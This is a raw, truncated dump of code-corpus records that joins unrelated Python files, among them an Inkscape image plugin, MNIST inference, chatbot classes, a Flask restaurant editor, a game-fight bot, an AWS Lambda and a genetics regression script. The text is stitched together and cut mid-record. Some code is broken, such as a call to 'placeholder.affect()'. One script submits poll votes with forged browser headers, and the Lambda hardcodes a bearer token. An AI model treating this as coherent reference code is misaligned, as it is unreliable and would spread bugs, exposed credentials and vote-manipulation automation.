BaseStreamer(description)\n\n","sub_path":"helpers/streamer.py","file_name":"streamer.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"534157185","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\nimport base64\nimport urllib2\nimport inkex\n\n\nclass UnsplashPlaceholder(inkex.Effect):\n def __init__(self):\n inkex.Effect.__init__(self)\n self.OptionParser.add_option('-W', '--width', action='store', type='string', dest='width',\n default='800', help='Set image width')\n self.OptionParser.add_option('-H', '--height', action='store', type='string', dest='height',\n default='680', help='Set image height')\n self.OptionParser.add_option('-C', '--category', action='store', type='string', dest='category',\n default='', help='Set image category')\n\n def effect(self):\n image = self._get_image()\n node = self._create_image_node(image)\n\n self.document.getroot().append(node)\n\n def _get_image(self):\n url = 'https://lorempixel.com/{width}/{height}/{category}'.format(\n width=self.options.width,\n height=self.options.height,\n category=self.options.category\n )\n response = urllib2.urlopen(url)\n data = response.read()\n return data\n\n def _create_image_node(self, data):\n attribs = {\n 'height': self.options.height,\n 'width': self.options.width,\n 'category': self.options.category,\n 'x': '0',\n 'y': '0',\n 'preserveAspectRatio': 'None',\n inkex.addNS('href', 'xlink'): u'data:image/jpeg;base64,' + base64.encodestring(data)\n }\n node = inkex.etree.Element(inkex.addNS('image','svg'), attribs)\n return node\n\n\nif __name__ == '__main__':\n placeholder = UnsplashPlaceholder()\n 
placeholder.affect()\n","sub_path":"lorempixel.py","file_name":"lorempixel.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"130929434","text":"# -*- coding: utf-8 -*-\r\nimport struct\r\nfrom PIL import Image\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport datetime\r\nimport os\r\nfrom inference_images import inference_images\r\nfrom inference_labels import inference_labels\r\n\r\n#train_epoch:2 accuracy:0.4951\r\nif __name__ == \"__main__\":\r\n\tprint(\"Begin inference!\")\r\n\t#base_path = \"/home/mnist_dataset\"\r\n\tbase_path = os.getcwd()\r\n\tbase_inference_path = os.path.join(base_path,\"test_data\")\r\n\tinference_image_path = os.path.join(base_inference_path,\"t10k-images-idx3-ubyte\")\r\n\tinference_label_path = os.path.join(base_inference_path,\"t10k-labels-idx1-ubyte\")\r\n\tinference_labels = inference_labels(inference_label_path)\r\n\tinference_images = inference_images(inference_image_path)\r\n\tinput_image_size = int(inference_images.get_row_number())*int(inference_images.get_column_number())\r\n\tright_count = 0\r\n\tbatchsize = 1\r\n\twith tf.Session() as sess:\r\n\t\tsaver = tf.train.import_meta_graph(os.path.join(base_path,\"train_data/checkPoint/trainModel.meta\"))\r\n\t\tsaver.restore(sess, tf.train.latest_checkpoint(os.path.join(base_path,\"train_data/checkPoint\")))\r\n\r\n\t\titerations = int(inference_images.get_images_number()/batchsize)\r\n\t\tfor step in range(iterations):\r\n\t\t\tlabel_vals = inference_labels.read_labels(batchsize)\r\n\t\t\tinference_image_pixs = inference_images.read_images(batchsize)\r\n\t\t\tinference_y_label = []\r\n\t\t\tfor item in label_vals:\r\n\t\t\t\tinference_sub_y_label = []\r\n\t\t\t\tfor i in range(10):\r\n\t\t\t\t\tif item != i:\r\n\t\t\t\t\t\tinference_sub_y_label.append(0)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tinference_sub_y_label.append(1)\r\n\t\t\t\t# append the finished one-hot vector once per label, after the inner loop\r\n\t\t\t\tinference_y_label.append(inference_sub_y_label)\r\n\t\t\tinference_x = np.array(inference_image_pixs,dtype=np.float32)\r\n\t\t\tinference_y = np.array(inference_y_label,dtype=np.float32)\r\n\t\t\t# fetch the operators that need to be evaluated\r\n\t\t\tYs = sess.graph.get_tensor_by_name('Ys:0')\r\n\t\t\tX = sess.graph.get_tensor_by_name('X:0')\r\n\t\t\tY_ = sess.graph.get_tensor_by_name('Y_:0')\r\n\t\t\tresults = sess.run(Ys,feed_dict={X:inference_x, Y_:inference_y})\r\n\t\t\tfor image_number in range(batchsize):\r\n\t\t\t\tmaxindex = np.argmax(results[image_number])\r\n\t\t\t\ttrue_label = np.argmax(inference_y[image_number])\r\n\t\t\t\tif maxindex == true_label:\r\n\t\t\t\t\tright_count = right_count + 1\r\n\r\n\t\tprint(\"right_count is:{}\".format(right_count))\r\n\t\tprint(\"total dataset is:{}\".format(inference_images.get_images_number()))\r\n\t\tprint(\"accuracy is:{}\".format(float(right_count)/inference_images.get_images_number()))\r\n\r\n\t\t# maxindex = np.argmax(sess.run(op,feed_dict={X:inference_x, Y_:inference_y}))\r\n\t\t# print maxindex \r\n\t\t# print np.argmax(inference_y[0])","sub_path":"mnist/mnist_FC/mnist_inference.py","file_name":"mnist_inference.py","file_ext":"py","file_size_in_byte":2554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"408030434","text":"#! 
/usr/bin/python\n\nimport httplib,urllib\n\nparams = urllib.urlencode({\"question_2755\" : \"10493\"})\n\nheaders = {\"Origin\":\"http://cgi.mmog.163.com:8088\",\n \"Accept-Encoding\":\"gzip,deflate,sdch\",\n \"Accept-Language\":\"en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4\",\n \"User-Agent\":\"Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36\",\n \"Content-Type\":\"application/x-www-form-urlencoded\",\n \"Accept\":\"application/json, text/javascript, */*\",\n \"Referer\":\"http://cgi.mmog.163.com:8088/v4a/show_vote/1106/?6\",\n \"X-Requested-With\":\"XMLHttpRequest\",\n \"Connection\":\"keep-alive\"}\n\n\nconn = httplib.HTTPConnection(\"cgi.mmog.163.com:8088\")\n\nconn.request(\"POST\", \"/v4a/show_vote/1106/\", params, headers)\n\nresponse = conn.getresponse()\n\nprint(response.status, response.reason)\n\ndata = response.read()\nfh = open('rece.html', 'w')\nfh.write(data)\nfh.close()\n\nconn.close()\n","sub_path":"http/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"202565482","text":"def count(arr,x):\r\n\tcount = 0\r\n\tfor y in arr:\r\n\t\tif x==y:\r\n\t\t\tcount+=1\r\n\treturn count\r\n\r\ndef greatest(arr,strings):\r\n\tmaxVal = -1\r\n\tmaxIndex = -1\r\n\tfor i in range(len(arr)):\r\n\t\tif arr[i]>maxVal:\r\n\t\t\tmaxVal = arr[i]\r\n\t\t\tmaxIndex = i\r\n\t\telif(arr[i]==maxVal):\r\n\t\t\tif(len(strings[i]) 0:\n # 有命中,进一步判断 confidence 是否达到要求\n confidence = respond[0][\"confidence\"]\n if confidence >= self.threshold:\n # 命中该问题,返回回答\n answer = respond[0][\"answer\"]\n if utils.validjson(answer):\n answer = random.choice(json.loads(answer))\n logger.info(\"{} 回答:{}\".format(self.SLUG, answer))\n return answer\n # 没有命中,走兜底\n if self.secondary != \"null\" and self.secondary is not None:\n try:\n ai = get_robot_by_slug(self.secondary)\n return ai.chat(texts, parsed)\n except Exception:\n logger.critical(\n \"Secondary robot {} failed to response for {}\".format(\n self.secondary, msg\n )\n )\n return get_unknown_response()\n else:\n return get_unknown_response()\n except Exception:\n logger.critical(\"AnyQ robot failed to response for %r\", msg, exc_info=True)\n return \"抱歉, 我的大脑短路了,请稍后再试试.\"\n\n\nclass OPENAIRobot(AbstractRobot):\n\n SLUG = \"openai\"\n\n def __init__(self, openai_api_key,model, temperature, max_tokens,top_p,frequency_penalty,presence_penalty,stop_ai):\n \"\"\"\n OpenAI机器人\n openai.api_key = os.getenv(\"OPENAI_API_KEY\")\n \"\"\"\n super(self.__class__, self).__init__()\n self.openai_api_key = openai_api_key\n openai.api_key=self.openai_api_key\n logger.info(self.openai_api_key)\n self.model = model\n self.temperature = temperature\n self.max_tokens = max_tokens\n self.top_p = top_p\n self.frequency_penalty = frequency_penalty\n self.presence_penalty = presence_penalty\n self.stop_ai = stop_ai\n\n @classmethod\n def get_config(cls):\n # Try to get anyq config from config\n return config.get(\"openai\", {})\n\n def chat(self, texts, parsed):\n \"\"\"\n 使用OpenAI机器人聊天\n\n Arguments:\n texts -- user input, typically speech, to be parsed by a module\n \"\"\"\n msg = \"\".join(texts)\n msg = utils.stripPunctuation(msg)\n try:\n response = openai.Completion.create(\n model=self.model,\n prompt=msg,\n temperature=self.temperature,\n max_tokens=self.max_tokens,\n top_p=self.top_p,\n frequency_penalty=self.frequency_penalty,\n presence_penalty=self.presence_penalty,\n 
stop=self.stop_ai\n )\n logger.debug(response)\n logger.debug(response.choices[0].text)\n respond=response.choices[0].text\n logger.info(\"openai response: {}\".format(respond))\n return respond\n \n except Exception:\n logger.critical(\"openai robot failed to response for %r\", msg, exc_info=True)\n return \"抱歉, 我的大脑短路了,请稍后再试试.\"\n\n\ndef get_unknown_response():\n \"\"\"\n 不知道怎么回答的情况下的答复\n\n :returns: 表示不知道的答复\n \"\"\"\n results = [\"抱歉,我不会这个呢\", \"我不会这个呢\", \"我还不会这个呢\", \"我还没学会这个呢\", \"对不起,你说的这���,我还不会\"]\n return random.choice(results)\n\n\ndef get_robot_by_slug(slug):\n \"\"\"\n Returns:\n A robot implementation available on the current platform\n \"\"\"\n if not slug or type(slug) is not str:\n raise TypeError(\"Invalid slug '%s'\", slug)\n\n selected_robots = list(\n filter(\n lambda robot: hasattr(robot, \"SLUG\") and robot.SLUG == slug, get_robots()\n )\n )\n if len(selected_robots) == 0:\n raise ValueError(\"No robot found for slug '%s'\" % slug)\n else:\n if len(selected_robots) > 1:\n logger.warning(\n \"WARNING: Multiple robots found for slug '%s'. \"\n + \"This is most certainly a bug.\" % slug\n )\n robot = selected_robots[0]\n logger.info(\"使用 {} 对话机器人\".format(robot.SLUG))\n return robot.get_instance()\n\n\ndef get_robots():\n def get_subclasses(cls):\n subclasses = set()\n for subclass in cls.__subclasses__():\n subclasses.add(subclass)\n subclasses.update(get_subclasses(subclass))\n return subclasses\n\n return [\n robot\n for robot in list(get_subclasses(AbstractRobot))\n if hasattr(robot, \"SLUG\") and robot.SLUG\n ]\n","sub_path":"robot/AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":9199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445914381","text":"from os import listdir, makedirs\nfrom os.path import isfile, join\nfrom pathlib import Path\nfrom pprint import pprint\nfrom time import sleep\n\nfrom requests import post\n\nfrom utils import to_color\n\n\nclass Team():\n def __init__(self, token, team_id):\n self.token = token\n self.id = None\n self.cookies = None\n self.owner = None\n self.compos = None\n self.path = 'https://leekwars.com/api/'\n self.team_getPrivate(team_id)\n\n def team_getPrivate(self, team_id):\n '''\n compos = r.json()[\"team\"][\"compositions\"] \n team_fights = compo[\"leeks\"][0][\"team_fights\"]\n '''\n res = post(self.path + 'team/get-private/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"team_id\": team_id}).json()\n for leek in res[\"members\"]:\n if leek[\"grade\"] == 'owner':\n self.owner = leek[\"name\"] # or leek[\"id\"]\n break\n self.compos = res[\"compositions\"]\n\n def team_registerTournaments(self):\n for compo in self.compos:\n res = self.__team_registerTournament(compo[\"id\"])\n if \"error\" in res:\n print(\"Can't register ({}): {}\".format(compo[\"name\"], res[\"error\"]))\n else:\n print(\"Successfully registered ({}).\".format(compo[\"name\"]))\n\n def __team_registerTournament(self, composition_id):\n return post(self.path + 'team/register-tournament/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"composition_id\": composition_id}).json()\n\n def __garden_getCompositionOpponents(self, composition):\n r = post(self.path + 'garden/get-composition-opponents/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"composition\": composition})\n self.cookies = r.cookies\n return r.json()\n \n def __garden_startTeamFight(self, composition_id, target_id):\n return post(self.path + 
'garden/start-team-fight/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"composition_id\": composition_id, \"target_id\": target_id},\n cookies=self.cookies).json()\n\n def __fight_get(self, fight_id):\n return post(self.path + 'fight/get/',\n headers={'Authorization': \"Bearer \"+self.token},\n data={\"fight_id\": fight_id},\n cookies=self.cookies).json()\n \n def wait_fight_result(self, fight_id):\n \"\"\"Wait the result of a fight.\n\n Args:\n fight_id (int): The id of the fight to wait\n \"\"\"\n nbr_wait = 0\n while True:\n res = self.__fight_get(fight_id)\n fight = res['fight']\n winner = fight['winner']\n if winner == -1: # Fight isn't resolved yet\n print(\"Waiting (\"+ str(1 + nbr_wait * 2) + \"s) .\" + \".\" * nbr_wait, end=\"\\r\", flush=True)\n nbr_wait += 1\n sleep(2)\n continue\n elif winner >= 0:\n WARNING = '\\033[93m'\n OKGREEN = '\\033[92m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n win = \"WTF?\"\n if winner == 0:\n win = to_color(\"DRAW\", None, True)\n #win = WARNING + \"DRAW\" + ENDC\n elif winner == 1:\n win = to_color(\"WIN \", True, False)\n #win = OKGREEN + \"WIN \" + ENDC\n elif winner == 2:\n win = to_color(\"LOSE\", False, False)\n #win = FAIL + \"LOSE\" + ENDC\n\n team1_name = fight['report']['team1']['name']\n team1_talent = fight['report']['team1']['talent'] + fight['report']['team1']['talent_gain']\n team2_name = fight['report']['team2']['name']\n team2_talent = fight['report']['team2']['talent'] + fight['report']['team2']['talent_gain']\n\n print(\" \" * (nbr_wait + 15), end=\"\\r\", flush=True)\n print(\"Team {} {} ({}) vs {} ({})\".format(win, team1_name, team1_talent, team2_name, team2_talent), flush=True)\n return\n\n def startTeamFights(self):\n fightIds = []\n for compo in self.compos:\n team_fights = compo[\"leeks\"][0][\"team_fights\"]\n print(\"\")\n print(\"Team [{}], {} leeks, level {}, {} talent\".format(\n compo[\"name\"], len(compo[\"leeks\"]), compo[\"total_level\"], compo[\"talent\"]))\n print(\"team_fights\", team_fights)\n for _ in range(0, team_fights):\n res = self.__garden_getCompositionOpponents(compo[\"id\"])\n if res[\"opponents\"]:\n # TODO: Select best opponent\n #pprint(res[\"opponents\"])\n opponent = res[\"opponents\"][0]\n #print(\"Start team Fight vs '{}', level {}, {} talent\".format(opponent[\"name\"], opponent[\"total_level\"], opponent[\"talent\"]))\n res = self.__garden_startTeamFight(compo[\"id\"], opponent[\"id\"])\n fightIds.append(res['fight'])\n self.wait_fight_result(res['fight'])\n #break\n","sub_path":"team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":5309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"73692326","text":"import unittest\nfrom Wpp.WppCore import WppCore\nfrom out.OutContextMemoryStream import OutContextMemoryStream\n\nclass TestWppInterface(unittest.TestCase):\n\tdef testExport(self):\n\t\tsource = \"\"\"\ninterface public A\ninterface public B\n\textends A\n\t\t\"\"\"\n\t\tmodule = WppCore.createMemModule(source, 'root.fake')\n\t\toutContext = OutContextMemoryStream()\n\t\tmodule.export(outContext)\n\t\tself.assertEqual(str(outContext), module.strPack(source))\n\n\tdef testInvalidParent(self):\n\t\tsource = \"\"\"\nclass public A\ninterface public B\n\textends A\n\t\t\"\"\"\n\t\twith self.assertRaises(RuntimeError) as cm:\n\t\t\tmodule = WppCore.createMemModule(source, 'root.fake')\n\t\tself.assertEqual(cm.exception.args[0], 'Invalid parent 
root.A:Class')\n","sub_path":"src1/Wpp/tests/testWppInterface.py","file_name":"testWppInterface.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"170202640","text":"###########\n# Imports #\n###########\n\nfrom flask import Flask, render_template, request, redirect, url_for\nfrom sqlalchemy.orm import sessionmaker\nfrom aa_run_first_database_setup import Base, Restaurant, User\nfrom flask import session as login_session\nimport json\nfrom sqlalchemy import create_engine\n\n###############\n# Setup Flask #\n###############\n\napp = Flask(__name__)\n\nCLIENT_ID = json.loads(\n open('z_client_test_services.json', 'r').read())['web']['client_id']\nAPPLICATION_NAME = \"Restaurant Menu Application\"\n\n# Connect to Database and create database session # small change\nengine = create_engine('sqlite:///restaurantmenuwithusers.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n\n##############################\n# Initial Required Functions #\n##############################\n\n# User Helper Functions\ndef create_user(login_session_):\n new_user = User(name=login_session_['username'], email=login_session_['email'], picture=login_session_['picture'])\n session.add(new_user)\n session.commit()\n user = session.query(User).filter_by(email=login_session_['email']).one()\n return user.id\n\n\ndef get_user_info(user_id):\n user = session.query(User).filter_by(id=user_id).one()\n return user\n\n\ndef get_user_id(email):\n try:\n user = session.query(User).filter_by(email=email).one()\n return user.id\n except:\n return None\n\n\n###########\n# Library #\n###########\n\ndef edit_one_restaurant(restaurant_id):\n edit_restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n logged_in_user = login_session['username']\n\n if 'username' not in login_session:\n return redirect('/ohnommy/login')\n\n if edit_restaurant.user_id != login_session['user_id']:\n return (\"\")\n\n if request.method == 'POST':\n if request.form['name']:\n edit_restaurant.name = request.form['name']\n if request.form['cuisines']:\n edit_restaurant.rtype = request.form['cuisines']\n if request.form['style']:\n edit_restaurant.diningStyle = request.form['style']\n if request.form['contact']:\n edit_restaurant.contactNo = request.form['contact']\n if request.form['location']:\n edit_restaurant.location = request.form['location']\n if request.form['website']:\n edit_restaurant.website = request.form['website']\n if request.form['openHour']:\n edit_restaurant.openTime = request.form['openHour']\n if request.form['closedHour']:\n edit_restaurant.closeTime = request.form['closedHour']\n if request.form['bsHour']:\n edit_restaurant.bsHours = request.form['bsHour']\n if request.form['beHour']:\n edit_restaurant.beHours = request.form['beHour']\n if request.form['lsHour']:\n edit_restaurant.lsHours = request.form['lsHour']\n if request.form['leHour']:\n edit_restaurant.leHours = request.form['leHour']\n if request.form['dsHour']:\n edit_restaurant.dsHours = request.form['dsHour']\n if request.form['deHour']:\n edit_restaurant.deHours = request.form['deHour']\n if request.form['aboutrestaurant']:\n edit_restaurant.about = request.form['aboutrestaurant']\n session.commit()\n return redirect(url_for('show_restaurant_page', restaurant_id=restaurant_id))\n else:\n return render_template('edit-restaurant.html', loggedInUser=logged_in_user, restaurant_id=restaurant_id,\n 
editRestaurant=edit_restaurant)\n\n\ndef delete_one_restaurant(restaurant_id):\n delete_restaurant = session.query(Restaurant).filter_by(id=restaurant_id).one()\n if 'username' in login_session:\n logged_in_user = login_session['username']\n else:\n return redirect('/ohnommy/login')\n\n if delete_restaurant.user_id != login_session['user_id']:\n return (\"\")\n\n if request.method == 'POST':\n session.delete(delete_restaurant)\n session.commit()\n return redirect(url_for('opening_page'))\n else:\n return render_template('delete-restaurant.html', loggedInUser=logged_in_user, restaurant_id=restaurant_id,\n deleteRestaurant=delete_restaurant)\n","sub_path":"Oh_Nommy/directory/g_edit_and_delete_restaurant.py","file_name":"g_edit_and_delete_restaurant.py","file_ext":"py","file_size_in_byte":4687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"122168164","text":"s=input(\"정수를 입력하세요 : \")\nl=s.split()#자동 리스트 작성\nl=[eval(i) for i in l]#list comprehension\nmax=0\nl.sort()\nfor i in range(0,l[-1]):\n if l.count(i)>=max:\n max=l.count(i)\n\nfor i in range(0,l[-1]):\n if l.count(i)==max:\n print(\"가장 많이 나온 숫자는 : {0}\".format(i))","sub_path":"untitled/14.2.py","file_name":"14.2.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"214746256","text":"import numpy as np\nimport random\nimport math\n\nMAX = 2147483647\n\n# mean-normalization\n# turn to [-1, 1]\n# returns\n# X, y matrix\n# rx, ry ranges\ndef meanNormalize(X, y):\n\trxmx = [-MAX for _ in range(len(X[0]))]\n\trxmn = [MAX for _ in range(len(X[0]))]\n\trymx = [-MAX]\n\trymn = [MAX]\n\tfor _ in X:\n\t\trxmx = [max(a, b) for a, b in zip(rxmx, _)]\n\t\trxmn = [min(a, b) for a, b in zip(rxmn, _)]\n\tfor _ in y:\n\t\trymx = [max(a, b) for a, b in zip(rymx, _)]\n\t\trymn = [min(a, b) for a, b in zip(rymn, _)]\n\n\trx = [[a, b] if b - a > 0.1 else [a - 0.1, b + 0.1] for a, b in zip(rxmn, rxmx)]\n\try = [rymn[0], rymx[0]] if rymx[0] - rymn[0] > 0.1 else [rymn[0] - 0.1, rymx[0] + 0.1]\n\n\tfor i in range(len(X)):\n\t\tX[i] = [(v - m[0]) / (m[1] - m[0]) * 2.0 - 1 for v, m in zip(X[i], rx)]\n\n\tfor i in range(len(y)):\n\t\ty[i] = (y[i][0] - ry[0]) / (ry[1] - ry[0]) * 2.0 - 1\n\treturn np.mat(X), np.mat(y).T, rx, ry\n\ndef gradient(X, y, theta):\n\tdiff = np.dot(X, theta) - y\n\treturn 1. 
/ X.shape[0] * (np.transpose(X) * diff)  # average the gradient over the number of training samples\n\n# gradient descent\n# return theta\ndef gradientDescent(X, y):\n\ttimes = 5000\n\talpha = 0.2\n\ttheta = np.zeros([X[0].size, 1])\n\tprint(theta)\n\tfor _ in range(times):\n\t\tgrad = gradient(X, y, theta)\n\t\ttheta = theta - alpha * grad\n\treturn theta\n\n\ndef lr(X, y):\n\tm = len(X[0])\n\tX, y, rx, ry = meanNormalize(X, y)\n\ttheta = gradientDescent(X, y)\n\ttmp = np.copy(theta)\n\ttheta[0] = tmp[0] * (ry[1] - ry[0]) / (rx[0][1] - rx[0][0])\n\tfor i in range(1, m):\n\t\ttheta[i] = tmp[i] * (ry[1] - ry[0]) / (rx[i][1] - rx[i][0])\n\t\ttheta[0] = theta[0] - tmp[i] * rx[i][0] * (ry[1] - ry[0]) / (rx[i][1] - rx[i][0]) + ry[0]\n\treturn theta\n\nif __name__ == '__main__':\n    print(\"hello world!\")","sub_path":"linerregression/liner.py","file_name":"liner.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435296264","text":"import json\nimport boto3\nimport decimal\nfrom botocore.vendored import requests as requests\nfrom uuid import uuid1\n\n\n# Helper class to convert a DynamoDB item to JSON.\nclass DecimalEncoder(json.JSONEncoder):\n    def default(self, o):\n        if isinstance(o, decimal.Decimal):\n            return int(o) if o % 1 == 0 else float(o)\n        \n        return super(DecimalEncoder, self).default(o)\n\n\ndef lambda_handler(event, context):\n    \n    task_id = event['pathParameters'].get('task_id')\n    sofier = event['queryStringParameters'].get('sofier')\n    \n    status, data = set_start_execution(task_id, sofier)\n    \n    return {\n        'statusCode': status,\n        'body': json.dumps(data, cls=DecimalEncoder),\n        'headers': {\n            'Access-Control-Allow-Origin': '*' \n        } \n    }\n\nURL = 'https://mysofie.com/api/v2/micro_task/execution/{task_id}/start'\n\nHEADERS = {'Authorization': 'Bearer RVVfU09VX0FfTEVOREE='}\n\ndef set_start_execution(task_id: str, sofier: str) -> tuple:\n    \"\"\"\n    \n    [X] - Retrieve the name of the task tied to this execution\n    [X] - Retrieve the task's execution flow\n    [X] - Report the task status to Bússola\n    \"\"\"\n    status, buffer = 500, None\n\n    #: MARK THE TASK AS RUNNING IN THE TASKS TABLE, RETRIEVING ITS VARIABLES\n    response_task = boto3.resource('dynamodb').Table('table_micro_task_in_person').get_item(\n        Key={'task_id': task_id},\n        ProjectionExpression='task.#name, variables',\n        ExpressionAttributeNames={'#name': 'name'}\n    )\n\n    #: RETRIEVE THE TASK'S EXECUTION FLOW\n    response_flow = boto3.resource('dynamodb').Table('table_micro_task_flows').get_item(\n        Key={'name': response_task['Item']['task']['name'], 'version': 1}\n    )\n\n    #: SIGNAL THE LEGACY BACKEND THAT THE TASK HAS STARTED\n    response = requests.post(URL.format(task_id=task_id), headers=HEADERS, params={'sofier': sofier})\n    if response.status_code != 200:\n        return response.status_code, response.json()\n\n    #: Format the final response\n    status = 200\n    response = {\n        'task_id': task_id,\n        'execution_id': str(uuid1()),\n        'task_flow': response_flow['Item']['task_flow'],\n        'variables': response_task['Item'].get('variables', dict()),\n        'task_info': {\n            'name': response_flow['Item']['name'],\n            'version': response_flow['Item']['version']\n        }\n    }\n    \n    return status, response","sub_path":"serverless_aws/LAMBDA FUNCTIONS/micro_task-start/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"70291784","text":"from DAO import *\nimport config as WebConfig
\nimport xlsxwriter\nimport json\n\nclass Report:\n    def DownloadReport(BiceId,FromDate,ToDate,path):\n        response=DataAccess.DownloadReport(BiceId,FromDate,ToDate)\n        print(path)\n        FileName=Report.CeateExcel(response,path)\n        return FileName\n    def CeateExcel(data,path):\n        filename=''\n        col=['Candidate_Id', 'Salutation', 'First_Name', 'Middle_Name', 'Last_Name', 'Bice_Name', 'Door_No_Street', 'City_Name', 'State_Name', 'Country_Name', 'Pincode', 'Dob', 'Mobile_Number', 'Max_Edu', 'Edu_Others', 'Id_Proof', 'Id_Number', 'Id_Others', 'Has_Bank', 'Bank_Name', 'Bank_Acc_Number', 'Created_By', 'Created_On', 'Bank_Image', 'Id_Proof_Image', 'Candidate_Image']\n        ImagePath=WebConfig.FilePath\n        try:\n            workbook = xlsxwriter.Workbook(path)\n\n            header_format = workbook.add_format({\n                'bold': True,\n                #'text_wrap': True,\n                'align': 'top',\n                'valign': 'center',\n                'fg_color': '#D7E4BC',\n                'border': 1})\n\n            write_format = workbook.add_format({\n                'border': 1,\n                'align': 'top',\n                'valign': 'top'})\n\n            url_format = workbook.add_format({\n                'border': 1,\n                'align': 'top',\n                'valign': 'top',\n                'font_color': 'blue',\n                'underline': 1})\n            worksheet = workbook.add_worksheet('Candidate Report')\n            for i in range(len(col)):\n                worksheet.write(0,i ,col[i], header_format) \n            for j in range(len(data)) : \n                for k in range(len(col)-3):\n                    worksheet.write(j+1,k ,data.iloc[j,k],write_format) \n                for l in range(k+1,len(col)):\n                    if data.iloc[j,l]==None or data.iloc[j,l]=='':\n                        worksheet.write(j+1,l ,'NA',write_format)\n                    else:\n                        worksheet.write_url(j+1,l,ImagePath+data.iloc[j,l], url_format, string='Image', tip='Click to open image')\n            \n            \n            workbook.close()\n            filename=path  # return the path of the workbook that was actually written\n        except Exception as e:\n            #filename='Error creating excel '+ str(e)\n            print(str(e))\n        \n        return filename\n\n","sub_path":"Models/Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"66952742","text":"import gevent, gevent.server\nfrom telnetsrv.green import TelnetHandler, command\n\nclass MyTelnetHandler(TelnetHandler):\n    WELCOME = \"Welcome to my server.\"\n\n    @command(['echo', 'copy', 'repeat'])\n    def command_echo(self, params):\n        '''\n        Echo text back to the console.\n\n        '''\n        self.writeresponse( ' '.join(params) )\n\n    @command('timer')\n    def command_timer(self, params):\n        '''
\\s+\\s+
(.*?)<\\/a><\\/figcaption>\\s+
\\s+\\s+(.*?)\\s+(.*?)\\s+(.*?)',\n flags = re.M)\n p = re.findall(pattern, r.text)\n return p\n\nif __name__ == \"__main__\":\n url = 'http://www.volleyball.world/en/vnl/women/results-and-ranking/round1'\n result = crawler(url)\n print(result)\n","sub_path":"用Python玩转数据/2.1/2.1 Practice4.py","file_name":"2.1 Practice4.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"332094178","text":"#!/well/kong/users/wiw765/anaconda2/bin/python\nimport numpy as np\nimport numpy.ma as ma\nfrom pysnptools.snpreader import Bed, Pheno\nfrom scipy.stats import zscore\nfrom sibreg import sibreg\nimport h5py, argparse\n\ndef read_covariates(covar_file,ids_to_match,missing):\n## Read a covariate file and reorder to match ids_to_match ##\n # Read covariate file\n covar_f = Pheno(covar_file, missing=missing).read()\n ids = covar_f.iid\n # Get covariate values\n n_X=covar_f._col.shape[0]+1\n X=np.ones((covar_f.val.shape[0],n_X))\n X[:, 1:n_X] = covar_f.val\n # Get covariate names\n X_names = np.zeros((n_X), dtype='S10')\n X_names[0] = 'Intercept'\n X_names[1:n_X] = np.array(covar_f._col, dtype='S20')\n # Remove NAs\n NA_rows = np.isnan(X).any(axis=1)\n n_NA_row = np.sum(NA_rows)\n if n_NA_row>0:\n print('Number of rows removed from covariate file due to missing observations: '+str(np.sum(NA_rows)))\n X = X[~NA_rows]\n ids = ids[~NA_rows]\n id_dict = {}\n for i in range(0,ids.shape[0]):\n id_dict[ids[i,1]] = i\n # Match with pheno_ids\n common_ids = id_dict.viewkeys() & set(ids_to_match[:,1])\n pheno_in = np.array([x in common_ids for x in ids_to_match[:,1]])\n match_ids = ids_to_match[pheno_in,1]\n X_id_match = np.array([id_dict[x] for x in match_ids])\n X = X[X_id_match, :]\n return [X,X_names,pheno_in]\n\n######### Command line arguments #########\nif __name__ == '__main__':\n parser=argparse.ArgumentParser()\n parser.add_argument('sibgts',type=str,help='Path to bed file with sibling genotypes')\n parser.add_argument('pargts', type=str, help='Path to HDF5 file with imputed parental genotypes')\n parser.add_argument('sibped',type=str,help='Path to pedigree file with siblings sharing a family ID and non-siblings not')\n parser.add_argument('phenofile',type=str,help='Location of the phenotype file')\n parser.add_argument('outprefix',type=str,help='Location to output association statistic hdf5 file')\n parser.add_argument('--covar',type=str,help='Location of covariate file (default None)',\n default=None)\n parser.add_argument('--fit_covariates',action='store_true',\n 